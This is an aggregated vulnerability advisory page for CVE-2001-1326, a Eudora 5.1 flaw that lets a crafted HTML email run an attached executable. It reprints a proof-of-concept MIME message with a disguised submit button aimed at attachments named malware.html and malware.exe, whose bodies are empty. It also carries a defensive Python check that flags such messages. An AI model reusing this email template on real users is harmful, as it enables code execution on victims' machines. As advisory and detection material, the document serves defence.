CVE-2001-1326
CVSS 7.5
Published: 2001-05-29 00:00:00
Last revised: 2008-09-05 16:26:15

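[Original] Eudora 5.1 allows remote attackers to execute arbitrary code when the "Use Microsoft Viewer" option is enabled and the "allow executables in HTML content" option is disabled, via an HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the form and access embedded attachments.


[CNNVD] Qualcomm Eudora Hidden Attachment Execution Vulnerability (CNNVD-200105-104)

        CVE(CAN) ID: CAN-2001-1326

        Eudora is an email client for the Windows platform. It contains a vulnerability: if the 'Use Microsoft viewer' option is enabled, an attacker may be able to execute arbitrary code on the remote host even when the 'allow executables in HTML content' option is disabled.

        The attacker crafts an email containing a forged submit button and two attachments (the two attachments being an executable program and JavaScript and ActiveX script). When the user clicks the forged submit button, the JavaScript and ActiveX script is opened and run in Internet Explorer, which in turn runs the attacker's executable program.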

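- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1326
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1326
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-104
(Official data source) CNNVD

- Other Links and Resources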

http://www.securityfocus.com/bid/2796
(VENDOR_ADVISORY)  BID  2796
http://www.securityfocus.com/archive/1/187128
(VENDOR_ADVISORY)  BUGTRAQ  20010528 feeble.hey!dora.exploit part.II

- Vulnerability Information

Qualcomm Eudora Hidden Attachment Execution Vulnerability
High risk  Unknown
2001-05-29 00:00:00 2005-10-20 00:00:00
Remote

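- Advisories and Patches

        Disable the 'Use Microsoft Viewer' option.

        Vendor patch:

        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

        http://www.eudora.com/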

- Vulnerability Information (20888)

Qualcomm Eudora 5.1 Hidden Attachment Execution Vulnerability (EDBID:20888)
windows remote
2001-05-29 Verified
0 http-equiv
N/A
source: http://www.securityfocus.com/bid/2796/info

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to execute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution. 

MIME-Version: 1.0
To: 
Subject: HEY!DORA
Content-Type: multipart/related;
 boundary="------------DB87F71CA55F5A135BFD6F03"


--------------DB87F71CA55F5A135BFD6F03
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
 <font color=#400040>To view the demo, please go here:</font><FORM action="cid:master.malware.com" method=post target=new><button  type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><font color=#0000ff><u>http://www.malware.com</u></font></button> </FORM>
<img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1></html>

--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <master.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.html"

--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream
Content-ID: <http://www.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"
--------------DB87F71CA55F5A135BFD6F03--
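
A mail-gateway style check for the message structure described above, as an added example that is not part of the original advisory or proof of concept: it flags an HTML part whose form action points, via a `cid:` URL, at another part of the same message. The sample message, the function name and the extension list are constructed for illustration.

```python
import email
import re
from email import policy

# Constructed sample message; the part bodies are placeholders, not real payloads.
SAMPLE = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset=us-ascii

<html><FORM action="cid:part1.example" method=post><button type=submit>link</button></FORM>
<img src="cid:logo.example" height=1 width=1></html>
--b1
Content-Type: application/octet-stream
Content-ID: <part1.example>
Content-Disposition: inline; filename="page.html"

placeholder
--b1
Content-Type: image/png
Content-ID: <logo.example>

placeholder
--b1--
"""

# A form that submits to a cid: URL hands an in-message part to the HTML viewer.
FORM_ACTION = re.compile(r'<form\b[^>]*\baction\s*=\s*["\']?cid:([^"\'\s>]+)', re.I)
RISKY_EXT = (".html", ".htm", ".mhtml", ".mht", ".exe", ".js", ".vbs", ".hta")  # assumed list

def find_cid_form_targets(raw):
    """Return (cid, filename, content_type) for form actions aimed at risky in-message parts."""
    msg = email.message_from_string(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    by_cid = {str(p["Content-ID"]).strip().strip("<>"): p for p in leaves if p["Content-ID"]}
    findings = []
    for part in leaves:
        if part.get_content_type() != "text/html":
            continue
        for cid in FORM_ACTION.findall(part.get_content()):
            target = by_cid.get(cid)
            if target is None:
                continue
            name = (target.get_filename() or "").lower()
            ctype = target.get_content_type()
            if name.endswith(RISKY_EXT) or ctype == "application/octet-stream":
                findings.append((cid, name, ctype))
    return findings
```

An ordinary inline image referenced by `cid:` from an `img` tag is not reported; only a form action that resolves to a script, HTML or untyped binary part is.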

		

- Vulnerability Information

8344
Eudora Attachment Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Eudora contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when the 'Use Microsoft Viewer' option is enabled and the 'allow executables in HTML content' option is disabled. It is possible that the flaw may allow a remote attacker to create a specially crafted HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the arbitrary code embedded in the attachment resulting in a loss of integrity.

- Timeline

2001-05-29 Unknown
2001-05-28 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Disable the 'Use Microsoft viewer' option.

- Related References

- Vulnerability Author

- Vulnerability Information

Qualcomm Eudora Hidden Attachment Execution Vulnerability
Unknown 2796
Yes No
2001-05-29 12:00:00 2009-07-11 06:06:00
Discovered and posted to Bugtraq by http-equiv@excite.com <http-equiv@excite.com> on May 29, 2001.

- Affected Software Versions

Qualcomm Eudora 5.1.1
Qualcomm Eudora 5.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0

- Vulnerability Discussion

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to execute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution.

- Exploit

A proof of concept email, containing a form with a 'disguised' submit button as well as two attachments has been created by http-equiv@excite.com. This email will exploit this vulnerability and execute a program on a victim system.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Related References
